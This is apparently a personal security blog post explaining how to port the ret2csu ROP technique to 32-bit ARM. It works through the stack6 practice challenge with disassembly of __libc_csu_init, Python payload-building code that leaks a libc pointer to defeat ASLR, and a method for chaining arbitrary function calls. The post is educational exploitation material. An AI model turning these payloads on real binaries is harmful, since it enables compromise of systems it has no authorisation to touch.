7 minutes
ret2csu ARM 32bit
Introduction
In this post I’ll show you how to port the ret2csu technique on ARM binaries. This technique allows full ASLR bypass using ROP gadgets inside the binary only. We will see that it also turns out to be a very effective technique to easily chain ROP gadgets.
Background
My recent interest in ARM exploitation led me to the Azeria Labs tutorials on ARM assembly and ARM exploitation. They are really great for beginners, teaching the basics of memory corruption vulnerabilities, how to exploit them, how to write ARM shellcode, and the basics of how to exploit Stack and Heap corruptions vulnerabilities. There are also stack overflow challenges to practice with the environment, the tools, and very basic exploitation techniques. The goal of the last challenge, called stack6, is
Get control over PC and execute your shellcode using techniques like ret2libc or ROP
The solution is very straightforward and the tutorials give you everything you need to apply ret2libc (also called ret2zp -
return to zero protection - on ARM).
The goal of ret2libc is to reuse libc code to eventually execute
system("/bin/sh\x00");
and get a shell. This generalization of this technique is ROP - Return Oriented Programming. An exercise I did for myself was to exploit the same challenge stack6 with a ROP chain in order to:
- call mprotect to set the stack as executable
- jump to my shellcode and get a shell.
While practicing with ROP on ARM, I realized that it’s not so straighforward to chain ROP gadgets. This article does a really good job in explaining how to do it, and I regret I didn’t find it before smashing my head and finding it by myself.
So far so good; let me recap what I learned with the tutorials and some exercises I made leveraging my knowledge of x86_64 exploitation:
- ARM assembly and shellcoding
- Basic stack overflow exploitation (no protections)
- ret2libc (or ret2zp) technique (NX protection bypass)
- very basic ROP exploitation (NX protection bypass)
What if there are more protections? Is ASLR turned on? If yes, is there a way to leak a libc pointer without relying on the program behaviour?
Can I use ROP to call functions with more than one parameter?
As a matter of fact it turns out that there is no easy answer to all those questions. At least, I wasn’t able to find answers online.
So I decided to investigate how __libc_csu_init
works on Linux and if it’s possible to abuse it as we do on x86_64 binaries.
Before we start
I will not cover the details here, I’m assuming you have a knowledge of advanced stack exploitation techniques on x86_64 and a basic understanding of ARM assembly and its function call convention.
ret2csu
If you get the stack6 executable and disassemble it, you can find the code of __libc_csu_init
:
00010584 <__libc_csu_init>:
10584: e92d43f8 push {r3, r4, r5, r6, r7, r8, r9, lr}
10588: e1a07000 mov r7, r0
1058c: e59f604c ldr r6, [pc, #76] ; 105e0 <__libc_csu_init+0x5c>
10590: e59f504c ldr r5, [pc, #76] ; 105e4 <__libc_csu_init+0x60>
10594: e08f6006 add r6, pc, r6
10598: e08f5005 add r5, pc, r5
1059c: e0656006 rsb r6, r5, r6
105a0: e1a08001 mov r8, r1
105a4: e1a09002 mov r9, r2
105a8: ebffff63 bl 1033c <_init>
105ac: e1b06146 asrs r6, r6, #2
105b0: 08bd83f8 popeq {r3, r4, r5, r6, r7, r8, r9, pc}
105b4: e2455004 sub r5, r5, #4
105b8: e3a04000 mov r4, #0
105bc: e2844001 add r4, r4, #1
105c0: e5b53004 ldr r3, [r5, #4]!
105c4: e1a00007 mov r0, r7
105c8: e1a01008 mov r1, r8
105cc: e1a02009 mov r2, r9
105d0: e12fff33 blx r3
105d4: e1540006 cmp r4, r6
105d8: 1afffff7 bne 105bc <__libc_csu_init+0x38>
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
105e0: 0001009c muleq r1, ip, r0
105e4: 00010094 muleq r1, r4, r0
We can see that there are two interesting gadgets, right? Let’s start analyzing the gadget at 0x105dc
:
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
This gadget allows us to fill r3,r4,r5,r6,r7,r8,r9
and the pc
register. We don’t need any of them if we want
to call a function, except for pc
.
But there is another gadget at 0x105c4
which, if combined with the previous one, can become pretty interesting
105c4: e1a00007 mov r0, r7
105c8: e1a01008 mov r1, r8
105cc: e1a02009 mov r2, r9
105d0: e12fff33 blx r3
Notice how r7, r8 and r9 are moved into r0, r1 and r2 respectively. Those three registers contain
the first three parameters of a function.
The gadget ends by branching (with link and exchange) to the address written inside r3 (which we also control).
By combining these two gadgets we can arbitrarily call a function with up to three parameters:
- Fill r0, r1 and r2 with the three parameters
- Fill r3 with the address of the function
Let’s see how this works, with the following python code
...
pop_many = p32(0x105dc)
mov_and_blx = p32(0x000105c4)
def ret2csu(r0, r1, r2, call):
payload = b""
payload += pop_many
payload += p32(call) #r3
payload += p32(0xAA) #r4
payload += p32(0xBB) #r5
payload += p32(0xCC) #r6
payload += p32(r0) #r7 -> r0
payload += p32(r1) #r8 -> r1
payload += p32(r2) #r9 -> r2
payload += mov_and_blx #pc
return payload
EIP_OFFSET = 0xYY
payload = b""
payload += b"A"*EIP_OFFSET
payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])
p.sendline(payload)
p.recvline()
leak = u32(p.recv(4))
log.success("Leaked: {}".format(hex(leak)))
gbyolo@kalimero: bof [master]× » python exploit_ret2csu.py
[*] '/opt/shared/asm/arm/bof/elf'
Arch: arm-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x10000)
RWX: Has RWX segments
[+] Connecting to 127.0.0.1 on port 5022: Done
[*] pi@127.0.0.1:
Distro Raspbian 10
OS: linux
Arch: Unknown
Version: 4.19.50
ASLR: Enabled
Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
[+] Starting remote process b'/home/pi/arm/elf' on 127.0.0.1: pid 447
[+] Leaked: 0xb6e14430
We successfully called write and leaked a libc pointer without relying on the program behaviour itself: whatever the program is, ret2csu
will always work.
This enables full ASLR bypass, so a second stage payload would just execute either system
or execve
, or whatever else you like.
Arbitrary ROP chaining
If you looked carefully at the ROP gadgets we used, you would notice that they can be chained in a circular way thus allowing to arbitrarily chain function calls in a x86_64 ROP like manner.
Let’s call POP_MANY the gadget at 0x105dc
and MOV_AND_BLX the gadget at 0x105c4
. The ret2csu
attack consists in executing firstly
POP_MANY and then MOV_AND_BLX.
105c4: e1a00007 mov r0, r7
105c8: e1a01008 mov r1, r8
105cc: e1a02009 mov r2, r9
105d0: e12fff33 blx r3
105d4: e1540006 cmp r4, r6
105d8: 1afffff7 bne 105bc <__libc_csu_init+0x38>
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
The last instruction of MOV_AND_BLX is our function call, invoked with a blx
arm instruction which will save the address of the next
instruction (i.e. 0x105d4
) in the link register (lr
) before actually jumping. In this way, when the function returns, the code will jump
back to this __libc_csu_init
code:
105d4: e1540006 cmp r4, r6
105d8: 1afffff7 bne 105bc <__libc_csu_init+0x38>
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
The registers r4 and r6 are compared, and if they are equal, we go back to POP_MANY, so we can still redirect the execution
flow. Can we control r4 and r6 such that they contain the same value after blx r3
? Of course! We executed the POP_MANY gadget before in
order to fill r0, r1 and r2, but we also filled r4, r5 and r6 with junk values;
The updated ret2csu
function is the following:
def ret2csu(r0, r1, r2, call, chain=False):
payload = b""
if not chain:
payload += pop_many
payload += p32(call) #r3
payload += p32(0x0) #r4
payload += p32(0x0) #r5
payload += p32(0x0) #r6. Set equal to r4
payload += p32(r0) #r7 -> r0
payload += p32(r1) #r8 -> r1
payload += p32(r2) #r9 -> r2
payload += mov_and_blx #pc
return payload
We can now generate a ROP chain such that
payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])
payload += ret2csu(0, 0, 0, elf.symbols['main'], chain=True)
payload += ret2csu(...)
payload += ret2csu(...)
And thus call as many functions as we want.
1347 Words
2020-07-13